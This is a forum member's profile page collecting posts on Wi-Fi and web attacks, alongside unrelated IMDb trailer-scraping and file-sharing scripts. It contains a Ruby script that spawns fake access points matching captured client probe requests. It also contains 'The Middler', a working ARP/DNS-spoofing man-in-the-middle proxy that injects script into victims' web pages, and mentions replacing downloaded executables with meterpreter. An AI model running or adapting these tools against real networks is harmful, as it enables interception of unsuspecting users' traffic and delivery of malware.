Jump to content

i8igmac

Dedicated Members
  • Posts

    939
  • Joined

  • Last visited

  • Days Won

    22

Everything posted by i8igmac

  1. iwconfig wlan0 channel 6 Ifcinfig wlan0 down Iwconfig wlan0 mode monitor Ifcinfig wlan up Airbase-ng wlan0 -e test-ap-channel-6 New tab in console Airodump-ng wlan0 So we have airodump channel Hopping and at the same time airbase is broadcasting a fake ap on channel 6... On my linux mint everything is working as I need. My goal is to capture with airodump all client probe request and then start airbase on channel 6 with the newly captured probe request... The problem is when I run this same commands above in kali linux. When airodump has your card in channel hop your same wlan device running airbase is also channel hopping... Any ideas why linux mint allows me to accomplish this?
  2. i had to boot up kali to get a working example of a fake ap with dnsmasq... simply follow this tutorial http://www.techgeektricks.blogspot.in/2013/07/mitm-wifi-honeypot.html and dont forget to add iptables to complete your clients internet connection wlan1 is established a connection to my droid hotspot 4g network... at0 traffic will now pass threw iptables --flush && iptables --table nat --flush && iptables --delete-chain && iptables --table nat --delete-chain iptables --table nat --append POSTROUTING --out-interface wlan1 -j MASQUERADE iptables --append FORWARD --in-interface at0 -j ACCEPT echo 1 > /proc/sys/net/ipv4/ip_forward
  3. Maybe some help setting up dhcp. I have nothing but problems with dhcpd3... maybe some simple alternatives. Labtop has 2 wifi devices. Wlan1 is connected to droid 4g 192.168.43.130 Wlan0 will be airbase-ng so should I set ifcinfig at0 192.168.44.1 up ? also how would u configure dhcp 192.168.0.100-250???
  4. karma was trouble to install on my machine, i didnt fill like booting bt... so here is a fake ap script... it will capture clients probe request and start a new esid... #start airodump-ng wlan0 -w airbase # this will simply scan airbase.csv file for client probe @pid_list=[]# this will hold the list of running esids, "netgear", "freewifi", "cisco" def refresh_list # read a airodump.csv file and sort threw clients data=File.open("airbase-01.csv","r") block=data.read cut=block.index("\r\n\r\n") block_1=block[146..cut] # here is your list of accespoints... block_2=block[cut+90..-1] # here is your list of clients buff=[] block_2.each_line{|x| buff<< x.split(",")[5..-1]} buff.uniq.each{|x| if not x==nil x.each{|y| if not y.include?(":") if not y.include?("(not associated)") y.map(&:strip).each{|z| if z.size>=1 if not @pid_list.include?(z) Thread.start{system("airbase-ng wlan0 -e \"#{z}\"")} @pid_list<<z end end } end end } end } end refresh_list while true sleep 10 refresh_list end
  5. If I may try... Think about a walky talky. Those hand held radio's can change channels by pressing a button... If you and your friend have both walky talkies on channle 1 then you can share a conversation... Your walky talkie can also channle hop. Could allow you to listen to all conversation on all channels by changing channels quickly. If you notice when you run airodump your wifi card is channel hopping. trying to record data on all channel's I tried :-) Edit. misread the question..
  6. verry true. browser COOKIE=finger. I guess I was thinking fingerprint of each client lol If finger.include?("windows") s.puts(meterpreter.exe) End Just example. Above... if anyone is interested in a team project. I made this example a few years ago... (I ment to post in community projects....) All the code is in my head, i have no time to build this. Packet manipulation is much needed around here
  7. Proxy source http://pastebin.com/n7AHi5Ny druring man in the middle, if a client downloads a executable of any kind... swap that data with meterpreter... I notice people request or ask for this kind of exploit... Rar, zip, msi, exe etc... maybe this community can help me build something from this proof of concept...
  8. I have found 1000 most common ssids. And my mistake for saying essids
  9. My phone for example will automatically connect to dd-wrt. Can a clients saved access pont be guessed? Airbase-ng wlan0 -e dd-wrt Is there a essid dictionary file? Maybe what am trying to do already exist?
  10. From Droid... There are a few steps you may have to take. Maybe set uid in ettercap config. Enable ipfarwording per iptables or ipchains os specific. These 2 above would help u Google search Content-length also plays a big part when moding data, always try something simple like replace(poo for pee) Try several webpages during your test msn, yahoo etc... Not https... I have some proof of concept I wrote in ruby, when a user downloads a executable during mitm, the binary data is replaced with a meterpreter shell https://vimeo.com/51230425
  11. #will get trailers.... #depends on apt-get install rtmpdump and wget #set of rules for this to work... the name of the folder must be proper name as listed below, these names are also exact match from imdb #/media/500_gig/movies/21 jump street (2012)/movie_file.avi <-------- GOOD #/media/500_gig/movies/21_jump_street_xvid_crap/movie_file.avi <--- BAD #example # ls /media/500_gig/movies/ # 21 Jump Street (2012) # antitrust (2001) # Avatar (2009) # Basketball diaries (1995) # be kind rewind (2008) # blank check (1994) # blow (2001) # buffalo soldiers (2001) #run this script from any directory... the destination derectory must be changed below #sudo ruby get_trailer "movie name (2000)" Need sudo to write data to hard drive require 'socket' require 'cgi' puts movie_name=ARGV[0] dst_dir="/media/6E88F3A627ADD9B7/movies/#{movie_name}/" #- <--------change this movie_name=movie_name.gsub(" ","+").chomp s=TCPSocket.open("www.imdb.com",80) s.print("GET /find?q=#{movie_name} HTTP/1.0\r\n\r\n") buff="" while line=s.gets buff<<line end s.close #gather movie_home link buff=buff.gsub('"',"") ping=buff.index("/title/") if ping==nil puts"EXIT: next" else movie_home=buff[ping..ping+16] # IFRAME home page / Root page crawl from starrting point tt=buff[ping+7..ping+15] end s=TCPSocket.open("www.imdb.com",80) buff1="" s.print("GET /title/#{tt}/ HTTP/1.0\r\n\r\n") while line=s.gets buff1<<line end s.close image_link=buff1.scan(/media.rm.*./).to_s[0..26] # media/rm871673856/tt1232829 rm=buff1.scan(/media.rm.*./).to_s[0..26].scan(/\/.*.\//).to_s buff2="" s=TCPSocket.open("www.imdb.com",80) s.print("GET /media#{rm}#{tt}/ HTTP/1.0\r\n\r\n") while line=s.gets buff2<<line end s.close if ping=buff1.index("video/imdb/vi") double_trailer_prevent=1 puts trailer_home=buff1[ping..ping+28] trailer_home=trailer_home.scan(/video.imdb.vi.*.\//) payload="GET /#{trailer_home}player?stop=0 HTTP/1.1 Host: www.imdb.com User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:16.0) Gecko/20100101 Firefox/16.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Proxy-Connection: keep-alive " buff3="" s=TCPSocket.open("www.imdb.com",80) s.print(payload) while line=s.recv(5000) buff3<<line if buff3.include?("</html>") break end end s.close buff3=buff3.gsub('"',"") ping=buff3.index("so.addVariable(file, ") pong=buff3.index(");",ping) v_file=buff3[ping+21..pong-1] v_file=CGI.unescape(v_file) if v_file.include?("rtmp") ping=buff3.index("so.addVariable(id, ") pong=buff3.index(");",ping) v_id=buff3[ping+19..pong-1] v_id=CGI.unescape(v_id) q='"' puts"\n" system("rtmpdump -r #{q}rtmp://amazonimdb.fcod.llnwd.net/a2643#{q} -a #{q}a2643#{q} -f #{q}LNX 11,2,202,243#{q} -W #{q}http://www.imdb.com/images/js/app/video/mediaplayer.swf#{q} -p #{q}http://www.imdb.com#{q} -y #{q}#{v_id}#{q} -o '#{dst_dir}trailer.flv'") end end if ping=buff1.index("video/screenplay/vi") if double_trailer_prevent==1 puts "double file download attempt" exit end puts trailer_home=buff1[ping..ping+30] trailer_home=trailer_home.scan(/video.screenplay.vi.*.\//) payload="GET /#{trailer_home}player?stop=0 HTTP/1.1 Host: www.imdb.com User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:16.0) Gecko/20100101 Firefox/16.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Proxy-Connection: keep-alive " buff3="" s=TCPSocket.open("www.imdb.com",80) s.print(payload) while line=s.recv(5000) buff3<<line if buff3.include?("</html>") break end end s.close buff3=buff3.gsub('"',"") ping=buff3.index("so.addVariable(file, ") pong=buff3.index(");",ping) v_file=buff3[ping+21..pong-1] v_file=CGI.unescape(v_file) if v_file.include?("http") puts"\n" system("wget '#{v_file}' -O '#{dst_dir}trailer.flv'") end end So, its ugly... dont judge me... it was sucessfull 95% (wrong name = fail, or trailer does not exist) there is no error checking... now to process a hole list will take another small script... irb mode... data=`ls /media/500_gig/movies/` for movie_name in data.map system("ruby get_trailer.rb 'movie_name.chomp'") end Now i hope to get some help with a template for the site... i just want to scrole threw a list of images like netflix... can some one contribute? im verry noob with building a webpage... so maybe some decent example code would be apriceated...
  12. Droid response, That is the easy download, I was sucessful lastnight with downloading RTMP stream :-) I got everything on order now just need to mod my script then launch
  13. (first post was from a droid so was quick_ now i have example to share) i have been using wireshark, tcpick, burp to investigate my way threw traffic and this is a working download request... you can try if you like or take my work for it... nc progressive.totaleclips.com.edgesuite.net > out.mp4 GET /127/e12782_301.mp4?eclipId=e12782&bitrateId=471&vendorId=102&type=.mp4&sp_ubid=746-5916787-1173752 HTTP/1.1 Host: progressive.totaleclips.com.edgesuite.net User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:16.0) Gecko/20100101 Firefox/16.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: keep-alive Referer: http://www.imdb.com/images/js/app/video/mediaplayer.swf (working on some examples for another reply)
  14. I have a orginized list of movies, I have autoated movie cover dl, actor image dl and movie description document... I'm compile this info into a website running on localhost. The most important feature is the trailer src that I strugle to automate this download... Omdb provides verry nice trailer that I hope to download OR just use the page/scrpt source... I can engineer a proper get request for a single download but I notice its not consistent src location... If some one can look at page src of i a mdb trailer. I don't have java script skill to defeat there security they try to prevent this... I'm open for ideas, iframe src could be the main page but this is sloppy and I want to isolate the vido only....
  15. This is one of those questions that come up all the time... Your mac address and local ip is not displayed across the internet. If your on a public wifi then I see no reason to worry about downloads...
  16. i appropriate your response... i would like to share a dictionary i built for lfi scanning... i use some google dorks to build it... http://pastebin.com/FdEJLbEu 255 possible files...
  17. Now this is just a example, im looking for help on building a list or a dictionary i have built a few scanners and crawlers, i have a idea... im sure its already been done but i like to do things my way... lets say you use wget to crawl and download a entire site, now you have all contents download into tmp directory then use a linux command like grep(just for example) to find a string... cat /tmp/site_crawl/ * | grep exec echo exec(var) echo pcntl_exec(var) ... example of a list i would like to build... passthru system exec pcntl_exec `` (backtick operator) im looking for a universal list for finding ALL possibility's, not just php... i guess the goal is to find a way to execute or write data on the server... maybe there are vulnerabilities for css, java, php etc... any string that may need further investigation... this is just example, im sure you will never find any php exec etc in plain text...
  18. I am also looking to start from the bottem, I'm looking into certs a+ sec+ net+ I would also like some advice, if I could get my foot in the door I feel I would succeed...
  19. I have made a tool that will mass download from megaupload, huge time saver. There is no capture images (security image) so this makes my script simple... As a paid user my tool could download 200 files at a time or as a free user 1 at a time with 30 second wait time... Another feature is a Google crawl to find what ever file your looking for and if the links are still working... Here is a tip, can be used with other file shares Google search: Inurl:"forum" intext:"megaupload.com/?d=" intext:"movie-file-name-year-2012" blueray
  20. I have made a tool that will mass download from megaupload, huge time saver. There is no capture images (security image) so this makes my script simple... As a paid user my tool could download 200 files at a time or as a free user 1 at a time with 30 second wait time... Another feature is a Google crawl to find what ever file your looking for and if the links are still working... Here is a tip, can be used with other file shares Google search: Inurl:"forum" intext:"megaupload.com/?d=" intext:"movie-file-name-year-2012" blueray
  21. i8igmac

    Trace Alert

    Hollywood sort of false advertise 'hacking' This is a big reason why I spent endless hours learning. "what is a cookie virus" from 1995 the movie hackers a cookie scrolls across the screen and supposavly eats up memery... A cookie is used when your web browser logs into a server, this cookie could be sniffed or stolen and give a hacker access to these websites This was my first question ;p
  22. i8igmac

    The Middler

    I have updated the above script, when the string is found "<head>" the script insert's a small hello world script right after and modify's the content-length of the current packet to make room for the extra data... all pages load properly and now i feel successful HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 P3P: CP="Facebook Set-Cookie: _e_0xIM_4=deleted X-Cnection: close Date: Fri, 13 Jan 2012 02:58:17 GMT Content-Length: 110 &lt;html&gt;&lt;head&gt;&lt;title&gt;&lt;/title&gt;&lt;/head&gt;&lt;body&gt;&lt;span id="fbEmuTrackingSuccess"&gt;Success&lt;/span&gt;&lt;/body&gt;&lt;/html&gt; Only if the packet includes "Content-length:" AND the desired string "<head>" then the exploit will be inserted... I have tried, searching for other strings like <script> <head> <body> etc... they all produce the same resaults the problem is, what if none of these exist? then no pages will be modified... what if there are several packets responding to one Get request that match up with my desired algorithm then there may be 10 exploits inserted on one page...
  23. i8igmac

    The Middler

    For testing, set your proxy settings for your browser to 80... my goal is to have all pages modified and still load perfectly... my last test script require 'eventmachine' attacker_ip="192.168.1.136" victim="192.168.1.110" gateway="192.168.1.1" dns = File.open("dns", "w+") dns.write("#{attacker_ip} *.*")# this is your ip, dns.close #"1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 ".split(/ /, 10).join # # set proxy settings in firefox to port 80 # uncommment these lines when you want to use arpsoof/dns #`pkill spoof` #a=Thread.new{system"xterm -e 'arpspoof -i wlan0 -t #{victim} #{gateway}'"} #c=Thread.new{system"xterm -e 'arpspoof -i wlan0 -t #{gateway} #{victim}'"} #b=Thread.new{system"xterm -e 'dnsspoof -i wlan0 -f dns'"} #a.run #b.run #c.run Thread.start{ class Client &lt; EM::Connection def initialize(other, finger, *args, &amp;blk) @other, @finger = other, finger super(*args, &amp;blk) end def post_init send_data @finger.sub("Accept-Encoding:","Assept-Ensoding:") end def receive_data(response) clength = response.scan(/Content-Length: \d+/).to_s.sub("Content-Length: ","") #clength = response.scan(/Content-Length: \d+/).to_s.split.slice(1).to_i #+ 17 #puts clength = response.scan(/Content-Length: \d+/) #puts clength #print "\n" if response.scan("Content-Length: ").to_s == "" #&amp;&amp; response.scan("&lt;body&gt;").to_s == "" @other.send_data response else if response.scan("&lt;head&gt;").to_s == "" @other.send_data response else exploit="&lt;script&gt;alert('hello world')&lt;/script&gt;" math=exploit.length puts response #@other.send_data response.sub("&lt;/title&gt;","&lt;/titlE&gt;\n&lt;iframe src='http://192.168.1.103:8181/lol' width='0' height='0' &lt;/iframe&gt;\n").sub("Content-Length: #{clength}","Content-Length: #{clength-clength}") #@other.send_data response.sub("&lt;/title&gt;","&lt;/titlE&gt;&lt;script&gt;alert('hellow world')&lt;/script&gt;").sub("Content-Length: #{clength}","Content-Length: #{clength-clength}") @other.send_data response.sub("&lt;head&gt;","&lt;head&gt;#{exploit}").sub("Content-Length: #{clength}","Content-Length: #{clength.to_i+math}") # .split(/ /, 9).join delete 9 blank spaces end end end end #browser open to http://192.168.1.114 module EchoServer def receive_data(finger) #finger is the header recived from the client, could log these cookies or log these pages #host = finger.to_a[1].chomp[6..-1] #host = finger.gsub(" ","").split[1].chomp[5..-1] #Thread.start{ ping = finger.gsub(" ","").index("Host:") pong = finger.gsub(" ","").index("\n",ping) host = finger.gsub(" ","")[ping..pong].gsub("Host:","").chomp #i dont know if this will prevent loading from cache data=finger.sub("If-None-Match:","If-None-MutXX:").sub("If-Modified-Since:","If-Modified-SXnce:") #print finger #puts host EventMachine::connect host, 80, Client, self, data # ask google for data end end } EventMachine::run { EventMachine::start_server attacker_ip, 80, EchoServer } # YOUR IP
×
×
  • Create New...